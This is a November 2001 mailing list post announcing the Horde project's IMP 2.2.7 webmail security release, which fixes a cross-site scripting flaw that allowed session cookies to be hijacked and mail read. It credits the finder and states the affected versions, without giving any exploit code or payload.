mailing list archives
IMP 2.2.7 (SECURITY) released
From: "Brent J. Nordquist" <bjn () horde org>
Date: Sat, 10 Nov 2001 09:05:26 -0600 (CST)
The Horde team announces the availability of IMP 2.2.7, which fixes a
potential session hijacking vulnerability using a cross-site scripting
(CSS) attack. We recommend that all sites running IMP 2.2.x upgrade to
The Horde Project would like to thank João Pedro Gonçalves from the
Phibernet Information Network <megas () phibernet org> for discovering this
problem and alerting us. From his description:
- It's possible to hijack an imp/horde session using a cross-site
script attack, quite similar to the one explored by Marc Slemko in his
"Microsoft Passport to Trouble" paper.
- After hijacking the cookies, the attacker can use the session and read
the victim's mail.
- All stable imp webmail versions, up to 2.2.6 including are vulnerable,
the devel version, 2.3 and 3.0 Release Candidate 1 are not affected by
This release also has a new Chinese (Simplified) translation.
This release can be downloaded from the following locations:
Brent J. Nordquist <bjn () horde org> N0BJN
Yahoo!: Brent_Nordquist / AIM: BrentJNordquist / ICQ: 76158942
- IMP 2.2.7 (SECURITY) released Brent J. Nordquist (Nov 10)